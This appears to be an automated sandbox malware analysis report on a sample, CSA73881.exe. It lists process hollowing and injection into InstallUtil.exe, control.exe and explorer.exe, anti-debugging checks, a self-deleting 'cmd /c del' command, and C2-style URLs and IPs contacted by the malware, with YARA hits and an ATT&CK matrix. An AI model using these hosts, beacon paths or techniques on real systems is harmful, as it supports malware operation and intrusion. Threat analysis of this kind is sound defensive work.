          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0139740D mov eax, dword ptr fs:[00000030h]14_2_0139740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0139740D mov eax, dword ptr fs:[00000030h]14_2_0139740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]14_2_01381C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]14_2_01381C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]14_2_01381C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]14_2_01381C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]14_2_01381C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]14_2_01381C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]14_2_01381C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]14_2_01381C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]14_2_01381C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]14_2_01381C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]14_2_01381C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]14_2_01381C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]14_2_01381C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]14_2_01381C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01346C0A mov eax, dword ptr fs:[00000030h]14_2_01346C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01346C0A mov eax, dword ptr fs:[00000030h]14_2_01346C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01346C0A mov eax, dword ptr fs:[00000030h]14_2_01346C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01346C0A mov eax, dword ptr fs:[00000030h]14_2_01346C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012E746D mov eax, dword ptr fs:[00000030h]14_2_012E746D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012FA44B mov eax, dword ptr fs:[00000030h]14_2_012FA44B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0135C450 mov eax, dword ptr fs:[00000030h]14_2_0135C450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0135C450 mov eax, dword ptr fs:[00000030h]14_2_0135C450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D849B mov eax, dword ptr fs:[00000030h]14_2_012D849B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_013814FB mov eax, dword ptr fs:[00000030h]14_2_013814FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01346CF0 mov eax, dword ptr fs:[00000030h]14_2_01346CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01346CF0 mov eax, dword ptr fs:[00000030h]14_2_01346CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01346CF0 mov eax, dword ptr fs:[00000030h]14_2_01346CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01398CD6 mov eax, dword ptr fs:[00000030h]14_2_01398CD6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012C4F2E mov eax, dword ptr fs:[00000030h]14_2_012C4F2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012C4F2E mov eax, dword ptr fs:[00000030h]14_2_012C4F2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012FE730 mov eax, dword ptr fs:[00000030h]14_2_012FE730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012FA70E mov eax, dword ptr fs:[00000030h]14_2_012FA70E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012FA70E mov eax, dword ptr fs:[00000030h]14_2_012FA70E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0135FF10 mov eax, dword ptr fs:[00000030h]14_2_0135FF10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0135FF10 mov eax, dword ptr fs:[00000030h]14_2_0135FF10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0139070D mov eax, dword ptr fs:[00000030h]14_2_0139070D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0139070D mov eax, dword ptr fs:[00000030h]14_2_0139070D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012EF716 mov eax, dword ptr fs:[00000030h]14_2_012EF716
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012DFF60 mov eax, dword ptr fs:[00000030h]14_2_012DFF60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01398F6A mov eax, dword ptr fs:[00000030h]14_2_01398F6A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012DEF40 mov eax, dword ptr fs:[00000030h]14_2_012DEF40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01347794 mov eax, dword ptr fs:[00000030h]14_2_01347794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01347794 mov eax, dword ptr fs:[00000030h]14_2_01347794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01347794 mov eax, dword ptr fs:[00000030h]14_2_01347794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D8794 mov eax, dword ptr fs:[00000030h]14_2_012D8794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_013037F5 mov eax, dword ptr fs:[00000030h]14_2_013037F5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0137FE3F mov eax, dword ptr fs:[00000030h]14_2_0137FE3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012CE620 mov eax, dword ptr fs:[00000030h]14_2_012CE620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012CC600 mov eax, dword ptr fs:[00000030h]14_2_012CC600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012CC600 mov eax, dword ptr fs:[00000030h]14_2_012CC600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012CC600 mov eax, dword ptr fs:[00000030h]14_2_012CC600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012F8E00 mov eax, dword ptr fs:[00000030h]14_2_012F8E00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01381608 mov eax, dword ptr fs:[00000030h]14_2_01381608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012FA61C mov eax, dword ptr fs:[00000030h]14_2_012FA61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012FA61C mov eax, dword ptr fs:[00000030h]14_2_012FA61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D766D mov eax, dword ptr fs:[00000030h]14_2_012D766D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012EAE73 mov eax, dword ptr fs:[00000030h]14_2_012EAE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012EAE73 mov eax, dword ptr fs:[00000030h]14_2_012EAE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012EAE73 mov eax, dword ptr fs:[00000030h]14_2_012EAE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012EAE73 mov eax, dword ptr fs:[00000030h]14_2_012EAE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012EAE73 mov eax, dword ptr fs:[00000030h]14_2_012EAE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D7E41 mov eax, dword ptr fs:[00000030h]14_2_012D7E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D7E41 mov eax, dword ptr fs:[00000030h]14_2_012D7E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D7E41 mov eax, dword ptr fs:[00000030h]14_2_012D7E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D7E41 mov eax, dword ptr fs:[00000030h]14_2_012D7E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D7E41 mov eax, dword ptr fs:[00000030h]14_2_012D7E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D7E41 mov eax, dword ptr fs:[00000030h]14_2_012D7E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0138AE44 mov eax, dword ptr fs:[00000030h]14_2_0138AE44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0138AE44 mov eax, dword ptr fs:[00000030h]14_2_0138AE44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_013446A7 mov eax, dword ptr fs:[00000030h]14_2_013446A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01390EA5 mov eax, dword ptr fs:[00000030h]14_2_01390EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01390EA5 mov eax, dword ptr fs:[00000030h]14_2_01390EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01390EA5 mov eax, dword ptr fs:[00000030h]14_2_01390EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0135FE87 mov eax, dword ptr fs:[00000030h]14_2_0135FE87
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012F16E0 mov ecx, dword ptr fs:[00000030h]14_2_012F16E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D76E2 mov eax, dword ptr fs:[00000030h]14_2_012D76E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012F36CC mov eax, dword ptr fs:[00000030h]14_2_012F36CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01398ED6 mov eax, dword ptr fs:[00000030h]14_2_01398ED6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0137FEC0 mov eax, dword ptr fs:[00000030h]14_2_0137FEC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01308EC7 mov eax, dword ptr fs:[00000030h]14_2_01308EC7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309910 NtAdjustPrivilegesToken,LdrInitializeThunk, 14_2_01309910
          Source: C:\Users\user\Desktop\CSA73881.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Domain query: www.segurambiental.com
          Source: C:\Windows\explorer.exe Domain query: www.browardhomeappraisal.com
          Source: C:\Windows\explorer.exe Network Connect: 103.224.182.210 80
          Source: C:\Windows\explorer.exe Domain query: www.esrfy.xyz
          Source: C:\Windows\explorer.exe Domain query: www.comgmaik.com
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Domain query: www.merendri.com
          Source: C:\Windows\explorer.exe Network Connect: 75.2.26.18 80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 890000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\CSA73881.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
          Source: C:\Users\user\Desktop\CSA73881.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 401000
          Source: C:\Users\user\Desktop\CSA73881.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: AB7008
          Source: C:\Users\user\Desktop\CSA73881.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread register set: target process: 3968
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread register set: target process: 3968
          Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3968
          Source: C:\Users\user\Desktop\CSA73881.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
          Source: explorer.exe, 00000010.00000000.318909636.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.375375689.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.435659578.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
          Source: explorer.exe, 00000010.00000000.356215989.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.386225698.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.321643618.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000010.00000000.321643618.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.396586239.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.437265455.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000010.00000000.321643618.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.396586239.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.437265455.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000010.00000000.395610041.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.319100792.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.375444766.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 00000010.00000000.321643618.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.396586239.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.437265455.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
          Source: C:\Users\user\Desktop\CSA73881.exe Queries volume information: C:\Users\user\Desktop\CSA73881.exe VolumeInformation
          Source: C:\Users\user\Desktop\CSA73881.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\CSA73881.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\CSA73881.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\CSA73881.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Users\user\Desktop\CSA73881.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\CSA73881.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\CSA73881.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\CSA73881.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match; File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
          Execution: 1 Shared Modules; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Privilege Escalation: 712 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Defense Evasion: 1 Rootkit; 1 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 712 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 11 Software Packing
          Credential Access: 1 Credential API Hooking; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          Discovery: 121 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Remote System Discovery; 112 System Information Discovery; System Owner/User Discovery; Network Sniffing; Network Service Scanning
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
          Collection: 1 Credential API Hooking; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
          Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
          Behavior Graph ID: 680378, Sample: CSA73881.exe, Startdate: 08/08/2022, Architecture: WINDOWS, Score: 100
          Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 9 other signatures
          CSA73881.exe (started): dropped C:\Users\user\AppData\...\CSA73881.exe.log, ASCII; Writes to foreign memory regions; Injects a PE file into a foreign processes
          InstallUtil.exe (started by CSA73881.exe): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
          control.exe (started by InstallUtil.exe): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          explorer.exe (injected by InstallUtil.exe): System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
          explorer.exe DNS/IP: www.comgmaik.com 103.224.182.210, 49846, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia; www.browardhomeappraisal.com 75.2.26.18, 49844, 80 AMAZON-02US United States; 4 other IPs or domains
          cmd.exe (started by control.exe)
          conhost.exe (started by cmd.exe)

          Source | Detection | Scanner | Label
          CSA73881.exe | 100% | Avira | HEUR/AGEN.1232160
          CSA73881.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
          Source | Detection | Scanner | Label
          14.0.InstallUtil.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.0.CSA73881.exe.de0000.0.unpack | 100% | Avira | HEUR/AGEN.1232160
          Source | Detection | Scanner | Label
          www.browardhomeappraisal.com | 7% | Virustotal |
          www.comgmaik.com | 2% | Virustotal |
          segurambiental.com | 9% | Virustotal |
          www.segurambiental.com | 6% | Virustotal |
          Source | Detection | Scanner | Label
          http://www.segurambiental.com/mh76/?Axo=j8MnV1AauDvQLYEDQHkxR7wEsLuzS8wOqoRJGUEtb1NYKXHLD1QrWCJCw/4m9jwcj9zX&e0Dd=gPHX06 | 0% | Avira URL Cloud | safe
          www.northpierangling.info/mh76/ | 100% | Avira URL Cloud | malware
          http://google.com)Exvkpxtvtblcdcgising7Uvadca.Properties.Resources | 0% | Avira URL Cloud | safe
          http://ww38.comgmaik.com/mh76/?Axo=0EXE3m3wBb2Nxgj7DVqNl/WDAC0gNsnNDZKaZxMvJErakGZtakhmesbqHtechaZLz | 0% | Avira URL Cloud | safe
          http://www.browardhomeappraisal.com/mh76/?Axo=ZKvJ8T01Uu5swSUTolvzZP3eEu33eLq9PUpXuYL3kSIE+YGu43QnDiKj3vyinvzv5HiX&e0Dd=gPHX06 | 0% | Avira URL Cloud | safe
          http://james.newtonking.com/projects/json | 0% | URL Reputation | safe
          http://www.comgmaik.com/mh76/?Axo=0EXE3m3wBb2Nxgj7DVqNl/WDAC0gNsnNDZKaZxMvJErakGZtakhmesbqHtechaZLzHZ4&e0Dd=gPHX06 | 0% | Avira URL Cloud | safe
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.browardhomeappraisal.com | 75.2.26.18 | true | true | | unknown
          www.comgmaik.com | 103.224.182.210 | true | true | | unknown
          segurambiental.com | 34.102.136.180 | true | false | | unknown
          www.segurambiental.com | unknown | unknown | true | | unknown
          www.esrfy.xyz | unknown | unknown | true | | unknown
          www.merendri.com | unknown | unknown | true | | unknown
          Name | Malicious | Antivirus Detection | Reputation
          http://www.segurambiental.com/mh76/?Axo=j8MnV1AauDvQLYEDQHkxR7wEsLuzS8wOqoRJGUEtb1NYKXHLD1QrWCJCw/4m9jwcj9zX&e0Dd=gPHX06 | false | Avira URL Cloud: safe | unknown
          www.northpierangling.info/mh76/ | true | Avira URL Cloud: malware | low
          http://www.browardhomeappraisal.com/mh76/?Axo=ZKvJ8T01Uu5swSUTolvzZP3eEu33eLq9PUpXuYL3kSIE+YGu43QnDiKj3vyinvzv5HiX&e0Dd=gPHX06 | true | Avira URL Cloud: safe | unknown
          http://www.comgmaik.com/mh76/?Axo=0EXE3m3wBb2Nxgj7DVqNl/WDAC0gNsnNDZKaZxMvJErakGZtakhmesbqHtechaZLzHZ4&e0Dd=gPHX06 | true | Avira URL Cloud: safe | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          https://www.nuget.org/packages/Newtonsoft.Json.Bson | CSA73881.exe, 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, CSA73881.exe, 00000000.00000002.327687009.000000000EE70000.00000004.08000000.00040000.00000000.sdmp | false | | high
          http://google.com)Exvkpxtvtblcdcgising7Uvadca.Properties.Resources | CSA73881.exe, 00000000.00000000.240713040.0000000000DE2000.00000002.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | low
          http://ww38.comgmaik.com/mh76/?Axo=0EXE3m3wBb2Nxgj7DVqNl/WDAC0gNsnNDZKaZxMvJErakGZtakhmesbqHtechaZLz | control.exe, 0000001C.00000002.776382935.00000000056CF000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://google.com | CSA73881.exe, 00000000.00000002.314006871.00000000032B1000.00000004.00000800.00020000.00000000.sdmp | false | | high
